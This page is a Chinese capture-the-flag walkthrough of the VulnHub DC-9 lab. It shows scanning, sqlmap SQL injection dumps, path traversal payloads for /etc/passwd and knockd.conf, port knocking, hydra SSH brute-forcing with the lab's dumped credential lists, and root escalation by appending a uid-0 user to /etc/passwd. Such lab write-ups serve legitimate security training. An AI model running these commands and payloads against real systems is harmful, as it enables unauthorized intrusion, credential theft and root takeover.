vulnhub靶场之DC-9

这篇具有很好参考价值的文章主要介绍了vulnhub靶场之DC-9。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一.环境搭建

1.靶场描述

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
 

只有一个flag

2.靶场下载地址

https://www.vulnhub.com/entry/dc-9,412
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

3.启动靶场

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.52.0/24
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

arp-scan -l
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

靶场的真实ip地址是192.168.52.131

(2)探测端口及服务

nmap -A -v -p- 192.168.52.131
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

注意到ssh服务端口是filtered的,可能是因为什么原因关闭了

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

发现开放了80端口,APache httpd 2.4.38((debian))
 

也可以使用masscan进行探测

masscan --rate=10000 --ports 0-65535 192.168.52.131
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

(3)web指纹识别

whatweb -v 192.168.52.131
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

3.渗透测试

(1)访问web服务

http://192.168.52.131
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

没有如何有用的信息

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.52.130
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

2)nikto扫描网站结构
nikto -h http://192.168.52.131
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

上面两个都没有扫描到有用的信息

3)dirsearch目录扫描
dirsearch -u 192.168.52.131 -e * -x 403 --random-agent
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

我们可以看到扫描到2个有用的信息,一个/inex.php/login,一个/manage.php

我们分别访问

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

我们可以看到是一个登录页面,看来需要我们进行登录,但是不知道用户名和密码,我们对页面进行探测

(3)渗透测试

1)页面探测

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

我们可以看到4个页面,我们一一进行探测,最后发现search存在POST型SQL注入

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

2)SQL注入

我们进行测试

search=1
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

search=1' or 1#
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

证明存在SQL注入,我们使用sqlmap进行爆破

爆破数据库

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1'

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' --dbs
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

我们看到存在3个数据库,我们爆破 Staff

爆破表名

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' --tables
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

爆破字段名

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -T 'Users' --columns
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

爆破用户名和密码

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -T 'Users' -C 'UserID,Username,Password' --dump
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

我们可以看到只有一个用户名和密码,密码是md5加密的,我们进行解密即可

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

密码是transorbital1

3)登录后台

我们接着用该密码登入后台

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

就多了个Add Record界面,注意到下面有File does not exist,想到是程序引用或读取了一个不存在的文件才会回显这个,接着用参数fuzz测试一下

burpsuite抓包,构建payload

?§§=../../../../../etc/passwd
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

然后再把我们的参数字典加载进来

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

参数名是file,存在目录遍历漏洞

4)端口敲门服务

考虑到ssh端口是关闭的,可能是开启了knock服务(参考端口敲门服务),利用文件包含确认一下,一般开启了knock服务就会存在/etc/knockd.conf文件

构造payload

/manage.php?file=../../../../../etc/knockd.conf
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

果然有,开启ssh服务得依次敲击7469,8475,9842端口,利用netcat进行敲击

nc -z 192.168.52.131 7469 8475 9842
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

敲击完后发现端口打开了

5)ssh爆破

我们使用ssh进行登录,发现登录不了

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

想起之前SQLmap跑出过一个users的数据库, 存放网站用户信息的,我们去瞧一下

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'users' -dump
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

用这些账号密码组成字典,爆破ssh

username.txt

marym 
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
 

password.txt

3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
 

接下来用九头蛇进行爆破

hydra -L username.txt -P password.txt ssh://192.168.52.131
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

爆破出来3个用户名和密码

chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee
 

尝试登入发现janitor用户有东西

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

有几个密码,复制到刚才的password文件继续爆破ssh

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

新添加了一个用户

我们进行登录

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

发现有个root权限文件

6) 提权

发现这里有个脚本文件可以无密码以root用户权限执行,我们进入/opt/devstuff/dist/test目录下先看看有什么信息,全是文件,回到上一个目录查看,也没什么,再回到上一个目录查看,在/opt/devstuff目录下发现了一个test.py脚本文件

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

我们查看文件内容

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,事先参考/etc/passwd解释

先利用openssl命令创建一个密码

openssl passwd -1 -salt <用户名> <密码>
openssl passwd -1 -salt MS02423 MS02423
 
 

得到hash密码,

$1$MS02423$xCJ3D9eufDuODS1PBNjp51
 

我们切换到tmp目录下,新建一个文件

cd /tmp
echo 'MS02423:$1$MS02423$xCJ3D9eufDuODS1PBNjp51:0:0::/root:/bin/bash' > MS02423
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

再回到/opt/devstuff/dist/test目录,执行程序test,将MS02423的文件内容写入到/etc/passwd文件里面

cd /opt/devstuff/dist/test
 
sudo ./test /tmp/MS02423 /etc/passwd
 
 

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

可以看到MS02423用户已经添加到/etc/passwd文件里了,接下来然后使用命令su MS02423 切换到我们添加的MS02423用户,输入之前设置好密码即可登录

跳转到/root目录下,成功看到flag

vulnhub靶场之DC-9,[ vulnhub靶机通关篇 ],web安全

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.burp工具的使用

9.dirsearch目录扫描

10.SQL注入

11.ssh登录

12.openssl命令

13.端口敲门服务

14.hydra爆破

15.目录遍历漏洞

 文章来源地址https://www.toymoban.com/news/detail-793382.html

到了这里,关于vulnhub靶场之DC-9的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub DC-4靶场

    目录 1.信息收集 2.漏洞利用 3.横向渗透 4.提升权限 搜索到ip sudo arp-scan -l 查看ip开放端口 nmap -p- 192.168.42.148 查找指纹,没有收获 查找目录,无敏感信息 访问网站,发现只有登录框,猜测为弱密码或密码爆破 bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)

    2024年02月05日
    浏览(87)
  • vulnhub DC-9靶场

    目录 1.信息收集 2.漏洞发掘 3.横向渗透 4.提升权限 4.1构造用户行,写入/etc/passwd 4.2构造权限行,写入/etc/sudoers 扫描主机 sudo arp-scan -l 扫描端口,发现只有80端口 nmap -p- 192.168.42.150 扫描80开放的服务 nmap -p 80 -A -V 192.168.42.150 访问主页面 发现有查找功能,猜测此处有sql注入漏洞 测

    2024年02月05日
    浏览(35)
  • Vulnhub靶场DC-1练习

    下载链接:https://download.vulnhub.com/dc/DC-1.zip 介绍:There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.(一共有五个flags,最终目标是进入root用户的目录。) 启动以后如下图: 将

    2023年04月11日
    浏览(32)
  • vulnhub靶场之DC-9

    只有一个flag 虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24 目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24 (1)寻找靶场真实ip 靶场的真实ip地址是192.168.52.131 (2)探测端口及服务 注意到ssh服务端口是filtered的,可能是因为什么原因关闭了 也

    2024年01月16日
    浏览(33)
  • vulnhub靶场之DC-2

    与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。 与最初的DC-1一样,它的设计考虑到了初学者。 Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个

    2024年01月22日
    浏览(38)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(32)
  • web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)

    制作图片马有两种方法,一种是文本方式打开,末尾粘贴一句话木马,令一种是使用命令进行合成。 方法1 首先准备好一个图片(这里是1.png)。 将一个图片以文本格式打开(这里用的Notepad++,以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了)。 后面粘

    2024年02月06日
    浏览(55)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(39)
  • vulnhub靶机AI-Web-1.0

    目录 靶机信息 主机信息 网站信息 SQL注入 权限提升 flag 靶机界面 确认攻击机和靶机在同一网段 查看下当前网段存活的主机 靶机的ip地址为10.4.7.145 扫下ip开放的端口 这边就开放了一个80 端口是一个Apache httpd 访问下网页 这个大概意思就是 连谷歌都搜不到我的信息 源码里也没

    2024年03月16日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包